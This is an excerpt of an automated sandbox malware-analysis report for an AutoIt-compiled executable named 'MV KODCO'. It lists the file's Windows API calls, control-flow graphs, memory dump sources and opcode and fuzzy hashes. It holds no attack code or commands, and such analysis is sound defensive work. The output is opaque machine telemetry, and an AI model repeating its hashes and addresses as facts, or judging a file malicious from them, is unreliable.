                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                          • String ID: ()i$This is a third-party compiled AutoIt script.$runas
                                                          • API String ID: 438480954-869125605
                                                          • Opcode ID: a54c077b37a1a0cfbd2a67011b4df50d27a304c6678b2ec76adf9a2e5b3fc6ab
                                                          • Instruction ID: 76748d557a7825a853bb438e3c28e18b92157a85c8590bc0c640d4fbb11a6c87
                                                          • Opcode Fuzzy Hash: a54c077b37a1a0cfbd2a67011b4df50d27a304c6678b2ec76adf9a2e5b3fc6ab
                                                          • Instruction Fuzzy Hash: 0E511830E0428AAACF09BBB6DC59EED7F7BBF47744F004064F6916B192DA605906CF21

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1138 5fddc0-5fde4f call 5ed7f7 GetVersionExW call 5e6a63 call 5fdfb4 call 5e6571 1147 5fde55-5fde56 1138->1147 1148 6524c8-6524cb 1138->1148 1149 5fde58-5fde63 1147->1149 1150 5fde92-5fdea2 call 5fdf77 1147->1150 1151 6524e4-6524e8 1148->1151 1152 6524cd 1148->1152 1153 5fde69-5fde6b 1149->1153 1154 65244e-652454 1149->1154 1169 5fdec7-5fdee1 1150->1169 1170 5fdea4-5fdec1 GetCurrentProcess call 5fdf5f 1150->1170 1157 6524d3-6524dc 1151->1157 1158 6524ea-6524f3 1151->1158 1156 6524d0 1152->1156 1160 652469-652475 1153->1160 1161 5fde71-5fde74 1153->1161 1163 652456-652459 1154->1163 1164 65245e-652464 1154->1164 1156->1157 1157->1151 1158->1156 1159 6524f5-6524f8 1158->1159 1159->1157 1165 652477-65247a 1160->1165 1166 65247f-652485 1160->1166 1167 652495-652498 1161->1167 1168 5fde7a-5fde89 1161->1168 1163->1150 1164->1150 1165->1150 1166->1150 1167->1150 1173 65249e-6524b3 1167->1173 1174 5fde8f 1168->1174 1175 65248a-652490 1168->1175 1171 5fdee3-5fdef7 call 5fe00c 1169->1171 1172 5fdf31-5fdf3b GetSystemInfo 1169->1172 1170->1169 1190 5fdec3 1170->1190 1185 5fdf29-5fdf2f GetSystemInfo 1171->1185 1186 5fdef9-5fdf01 call 5fdff4 GetNativeSystemInfo 1171->1186 1181 5fdf0e-5fdf1a 1172->1181 1178 6524b5-6524b8 1173->1178 1179 6524bd-6524c3 1173->1179 1174->1150 1175->1150 1178->1150 1179->1150 1183 5fdf1c-5fdf1f FreeLibrary 1181->1183 1184 5fdf21-5fdf26 1181->1184 1183->1184 1189 5fdf03-5fdf07 1185->1189 1186->1189 1189->1181 1192 5fdf09-5fdf0c FreeLibrary 1189->1192 1190->1169 1192->1181
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 005FDDEC
                                                          • GetCurrentProcess.KERNEL32(00000000,0067DC38,?,?), ref: 005FDEAC
                                                          • GetNativeSystemInfo.KERNELBASE(?,0067DC38,?,?), ref: 005FDF01
                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 005FDF0C
                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 005FDF1F
                                                          • GetSystemInfo.KERNEL32(?,0067DC38,?,?), ref: 005FDF29
                                                          • GetSystemInfo.KERNEL32(?,0067DC38,?,?), ref: 005FDF35
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                          • String ID:
                                                          • API String ID: 3851250370-0
                                                          • Opcode ID: 8fbe6477b8ddbec652d710ed2597cd2657ae059ef821bf203416cf1cd35e1478
                                                          • Instruction ID: 6d37badff67742d458bd4776e0d149b1e856316dcbd17eadcbaa24ed217c26df
                                                          • Opcode Fuzzy Hash: 8fbe6477b8ddbec652d710ed2597cd2657ae059ef821bf203416cf1cd35e1478
                                                          • Instruction Fuzzy Hash: 1761C2B180A389DBCF15CF6898C05E97FB67F2A300F1989D8D9459F207C628C909CB66

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1210 5e406b-5e4083 CreateStreamOnHGlobal 1211 5e4085-5e409c FindResourceExW 1210->1211 1212 5e40a3-5e40a6 1210->1212 1213 654f16-654f25 LoadResource 1211->1213 1214 5e40a2 1211->1214 1213->1214 1215 654f2b-654f39 SizeofResource 1213->1215 1214->1212 1215->1214 1216 654f3f-654f4a LockResource 1215->1216 1216->1214 1217 654f50-654f6e 1216->1217 1217->1214
                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005E449E,?,?,00000000,00000001), ref: 005E407B
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005E449E,?,?,00000000,00000001), ref: 005E4092
                                                          • LoadResource.KERNEL32(?,00000000,?,?,005E449E,?,?,00000000,00000001,?,?,?,?,?,?,005E41FB), ref: 00654F1A
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,005E449E,?,?,00000000,00000001,?,?,?,?,?,?,005E41FB), ref: 00654F2F
                                                          • LockResource.KERNEL32(005E449E,?,?,005E449E,?,?,00000000,00000001,?,?,?,?,?,?,005E41FB,00000000), ref: 00654F42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: 4dbe12649b05417bec734ff615ff58182b311ca68c812ff14e6d7c704de072d9
                                                          • Instruction ID: b1af26b57944fc7305a99f735a02c2e2d21cee79fec8dc05aa3d8633309a3d0f
                                                          • Opcode Fuzzy Hash: 4dbe12649b05417bec734ff615ff58182b311ca68c812ff14e6d7c704de072d9
                                                          • Instruction Fuzzy Hash: E9117C70A00741BFE7258B66EC48F277BBEEBC5B55F10416CF6428A2A0DBB1DC009A20
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00652F49), ref: 00626CB9
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00626CCA
                                                          • FindClose.KERNEL32(00000000), ref: 00626CDA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: 696f8cc2b8d250ceea79b54cf78c0db524b6b6ac6b78c2fd106fb2ea600ba44b
                                                          • Instruction ID: d995f6d2975adb677d99a13057b278a87965408f096e632e3160e00d6def3caa
                                                          • Opcode Fuzzy Hash: 696f8cc2b8d250ceea79b54cf78c0db524b6b6ac6b78c2fd106fb2ea600ba44b
                                                          • Instruction Fuzzy Hash: 29E01231A149255783146738EC094E976AEDB4A339B104715F575C12D0E7F099444A95
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005EE959
                                                          • timeGetTime.WINMM ref: 005EEBFA
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005EED2E
                                                          • TranslateMessage.USER32(?), ref: 005EED3F
                                                          • DispatchMessageW.USER32(?), ref: 005EED4A
                                                          • LockWindowUpdate.USER32(00000000), ref: 005EED79
                                                          • DestroyWindow.USER32 ref: 005EED85
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005EED9F
                                                          • Sleep.KERNEL32(0000000A), ref: 00655270
                                                          • TranslateMessage.USER32(?), ref: 006559F7
                                                          • DispatchMessageW.USER32(?), ref: 00655A05
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00655A19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                          • API String ID: 2641332412-570651680
                                                          • Opcode ID: 5e654383f20bcc3f2aec1ad21d35c563c5f38fb528dbf377baebfa0c68b70260
                                                          • Instruction ID: 944016ac7670bb7f16e46f8b74bca3b35e388c7ccd76ef3c4253b4773f81a3ec
                                                          • Opcode Fuzzy Hash: 5e654383f20bcc3f2aec1ad21d35c563c5f38fb528dbf377baebfa0c68b70260
                                                          • Instruction Fuzzy Hash: 3F622B70504381DFD724DF25C89ABAA7BE6BF85304F14487DF9868B292DB74E848CB52
                                                          APIs
                                                          • ___createFile.LIBCMT ref: 00615EC3
                                                          • ___createFile.LIBCMT ref: 00615F04
                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00615F2D
                                                          • __dosmaperr.LIBCMT ref: 00615F34
                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00615F47
                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00615F6A
                                                          • __dosmaperr.LIBCMT ref: 00615F73
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00615F7C
                                                          • __set_osfhnd.LIBCMT ref: 00615FAC
                                                          • __lseeki64_nolock.LIBCMT ref: 00616016
                                                          • __close_nolock.LIBCMT ref: 0061603C
                                                          • __chsize_nolock.LIBCMT ref: 0061606C
                                                          • __lseeki64_nolock.LIBCMT ref: 0061607E
                                                          • __lseeki64_nolock.LIBCMT ref: 00616176
                                                          • __lseeki64_nolock.LIBCMT ref: 0061618B
                                                          • __close_nolock.LIBCMT ref: 006161EB
                                                            • Part of subcall function 0060EA9C: CloseHandle.KERNELBASE(00000000,0068EEF4,00000000,?,00616041,0068EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0060EAEC
                                                            • Part of subcall function 0060EA9C: GetLastError.KERNEL32(?,00616041,0068EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0060EAF6
                                                            • Part of subcall function 0060EA9C: __free_osfhnd.LIBCMT ref: 0060EB03
                                                            • Part of subcall function 0060EA9C: __dosmaperr.LIBCMT ref: 0060EB25
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          • __lseeki64_nolock.LIBCMT ref: 0061620D
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00616342
                                                          • ___createFile.LIBCMT ref: 00616361
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0061636E
                                                          • __dosmaperr.LIBCMT ref: 00616375
                                                          • __free_osfhnd.LIBCMT ref: 00616395
                                                          • __invoke_watson.LIBCMT ref: 006163C3
                                                          • __wsopen_helper.LIBCMT ref: 006163DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                          • String ID: @
                                                          • API String ID: 3896587723-2766056989
                                                          • Opcode ID: ec3d79892c04ba75948ee1959ed685d359904b26f11bce48ad5c21d34c0e4549
                                                          • Instruction ID: bda25b13f1d81c16b450e5e4d4e794b561a91dbc5e59424534b1fbddb672b33e
                                                          • Opcode Fuzzy Hash: ec3d79892c04ba75948ee1959ed685d359904b26f11bce48ad5c21d34c0e4549
                                                          • Instruction Fuzzy Hash: 8E221275D006059FEB299E68D845BEEBB63EF44314F2C8228F9229B3D1C2358DD1CB95

                                                          Control-flow Graph

                                                          APIs
                                                          • _wcscpy.LIBCMT ref: 0062FA96
                                                          • _wcschr.LIBCMT ref: 0062FAA4
                                                          • _wcscpy.LIBCMT ref: 0062FABB
                                                          • _wcscat.LIBCMT ref: 0062FACA
                                                          • _wcscat.LIBCMT ref: 0062FAE8
                                                          • _wcscpy.LIBCMT ref: 0062FB09
                                                          • __wsplitpath.LIBCMT ref: 0062FBE6
                                                          • _wcscpy.LIBCMT ref: 0062FC0B
                                                          • _wcscpy.LIBCMT ref: 0062FC1D
                                                          • _wcscpy.LIBCMT ref: 0062FC32
                                                          • _wcscat.LIBCMT ref: 0062FC47
                                                          • _wcscat.LIBCMT ref: 0062FC59
                                                          • _wcscat.LIBCMT ref: 0062FC6E
                                                            • Part of subcall function 0062BFA4: _wcscmp.LIBCMT ref: 0062C03E
                                                            • Part of subcall function 0062BFA4: __wsplitpath.LIBCMT ref: 0062C083
                                                            • Part of subcall function 0062BFA4: _wcscpy.LIBCMT ref: 0062C096
                                                            • Part of subcall function 0062BFA4: _wcscat.LIBCMT ref: 0062C0A9
                                                            • Part of subcall function 0062BFA4: __wsplitpath.LIBCMT ref: 0062C0CE
                                                            • Part of subcall function 0062BFA4: _wcscat.LIBCMT ref: 0062C0E4
                                                            • Part of subcall function 0062BFA4: _wcscat.LIBCMT ref: 0062C0F7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                          • String ID: >>>AUTOIT SCRIPT<<<$t2i
                                                          • API String ID: 2955681530-3087437589
                                                          • Opcode ID: 3e7ba7ee6cc7d25dd88a5fe63f0b8662c508d7e924a38579f6c847981e2a4e9a
                                                          • Instruction ID: 4615b1ce3c8ad74145c2b5e73c1c5d292cff81b53359a3653050f25942e988a1
                                                          • Opcode Fuzzy Hash: 3e7ba7ee6cc7d25dd88a5fe63f0b8662c508d7e924a38579f6c847981e2a4e9a
                                                          • Instruction Fuzzy Hash: 1C91DF72504745AFDB24EB50C855F9BB3EABF98300F00482DF98997292DB34EA44CF96

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 005E3F86
                                                          • RegisterClassExW.USER32(00000030), ref: 005E3FB0
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E3FC1
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 005E3FDE
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005E3FEE
                                                          • LoadIconW.USER32(000000A9), ref: 005E4004
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005E4013
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 9d2a6e66daa83f41afd662dd2186ab725bc2269fb5b5636d1516b9bf531e6f82
                                                          • Instruction ID: 849ec6e9fff65a68172e9a43594bd8caee85f43957c4b8303e15caac8e602433
                                                          • Opcode Fuzzy Hash: 9d2a6e66daa83f41afd662dd2186ab725bc2269fb5b5636d1516b9bf531e6f82
                                                          • Instruction Fuzzy Hash: 0F21E7B5D00218AFDB00AFA4E849B8DBBB6FB0A700F14611AF511AA2A0D7B515448F91

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0062BDB4: __time64.LIBCMT ref: 0062BDBE
                                                            • Part of subcall function 005E4517: _fseek.LIBCMT ref: 005E452F
                                                          • __wsplitpath.LIBCMT ref: 0062C083
                                                            • Part of subcall function 00601DFC: __wsplitpath_helper.LIBCMT ref: 00601E3C
                                                          • _wcscpy.LIBCMT ref: 0062C096
                                                          • _wcscat.LIBCMT ref: 0062C0A9
                                                          • __wsplitpath.LIBCMT ref: 0062C0CE
                                                          • _wcscat.LIBCMT ref: 0062C0E4
                                                          • _wcscat.LIBCMT ref: 0062C0F7
                                                          • _wcscmp.LIBCMT ref: 0062C03E
                                                            • Part of subcall function 0062C56D: _wcscmp.LIBCMT ref: 0062C65D
                                                            • Part of subcall function 0062C56D: _wcscmp.LIBCMT ref: 0062C670
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0062C2A1
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0062C338
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0062C34E
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0062C35F
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0062C371
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                          • String ID:
                                                          • API String ID: 2378138488-0
                                                          • Opcode ID: 4ef5f4c09453fe0e53a2e53b336eb579a387516d5bb0d5c08a73ab5844ca1c9e
                                                          • Instruction ID: b1f5e178075d86e2af3a165f198afe26accbef81862df4ea07729ed3fb211383
                                                          • Opcode Fuzzy Hash: 4ef5f4c09453fe0e53a2e53b336eb579a387516d5bb0d5c08a73ab5844ca1c9e
                                                          • Instruction Fuzzy Hash: F9C17EB1E00129ABDF15DF95DC85EDEBBBEEF44310F0080AAF609E6151DB709A448F65

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 958 5e3742-5e3762 960 5e3764-5e3767 958->960 961 5e37c2-5e37c4 958->961 963 5e37c8 960->963 964 5e3769-5e3770 960->964 961->960 962 5e37c6 961->962 965 5e37ab-5e37b3 DefWindowProcW 962->965 966 5e37ce-5e37d1 963->966 967 651e00-651e2e call 5e2ff6 call 5fe312 963->967 968 5e382c-5e3834 PostQuitMessage 964->968 969 5e3776-5e377b 964->969 976 5e37b9-5e37bf 965->976 970 5e37f6-5e381d SetTimer RegisterWindowMessageW 966->970 971 5e37d3-5e37d4 966->971 1005 651e33-651e3a 967->1005 975 5e37f2-5e37f4 968->975 973 651e88-651e9c call 624ddd 969->973 974 5e3781-5e3783 969->974 970->975 980 5e381f-5e382a CreatePopupMenu 970->980 977 5e37da-5e37ed KillTimer call 5e3847 call 5e390f 971->977 978 651da3-651da6 971->978 973->975 999 651ea2 973->999 981 5e3789-5e378e 974->981 982 5e3836-5e3845 call 5feb83 974->982 975->976 977->975 984 651ddc-651dfb MoveWindow 978->984 985 651da8-651daa 978->985 980->975 988 651e6d-651e74 981->988 989 5e3794-5e3799 981->989 982->975 984->975 992 651dac-651daf 985->992 993 651dcb-651dd7 SetFocus 985->993 988->965 995 651e7a-651e83 call 61a5f3 988->995 997 5e379f-5e37a5 989->997 998 651e58-651e68 call 6255bd 989->998 992->997 1001 651db5-651dc6 call 5e2ff6 992->1001 993->975 995->965 997->965 997->1005 998->975 999->965 1001->975 1005->965 1009 651e40-651e53 call 5e3847 call 5e4ffc 1005->1009 1009->965
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 005E37B3
                                                          • KillTimer.USER32(?,00000001), ref: 005E37DD
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005E3800
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E380B
                                                          • CreatePopupMenu.USER32 ref: 005E381F
                                                          • PostQuitMessage.USER32(00000000), ref: 005E382E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: 5d203e101263be309f57a606851fd58de1b8521b94cd2cd033825d6ea75d05b9
                                                          • Instruction ID: fd74f66c6bdaf5a30bc86e239a2497569f1f9c893d0e1c39662bdbc9e17edc81
                                                          • Opcode Fuzzy Hash: 5d203e101263be309f57a606851fd58de1b8521b94cd2cd033825d6ea75d05b9
                                                          • Instruction Fuzzy Hash: 404159F56041E6ABDB186F2ADC4EBBA3E57FB43301F001515F992DB1A1CB61AF408B61

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 005E3E79
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 005E3E88
                                                          • LoadIconW.USER32(00000063), ref: 005E3E9E
                                                          • LoadIconW.USER32(000000A4), ref: 005E3EB0
                                                          • LoadIconW.USER32(000000A2), ref: 005E3EC2
                                                            • Part of subcall function 005E4024: LoadImageW.USER32(005E0000,00000063,00000001,00000010,00000010,00000000), ref: 005E4048
                                                          • RegisterClassExW.USER32(?), ref: 005E3F30
                                                            • Part of subcall function 005E3F53: GetSysColorBrush.USER32(0000000F), ref: 005E3F86
                                                            • Part of subcall function 005E3F53: RegisterClassExW.USER32(00000030), ref: 005E3FB0
                                                            • Part of subcall function 005E3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E3FC1
                                                            • Part of subcall function 005E3F53: InitCommonControlsEx.COMCTL32(?), ref: 005E3FDE
                                                            • Part of subcall function 005E3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005E3FEE
                                                            • Part of subcall function 005E3F53: LoadIconW.USER32(000000A9), ref: 005E4004
                                                            • Part of subcall function 005E3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005E4013
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
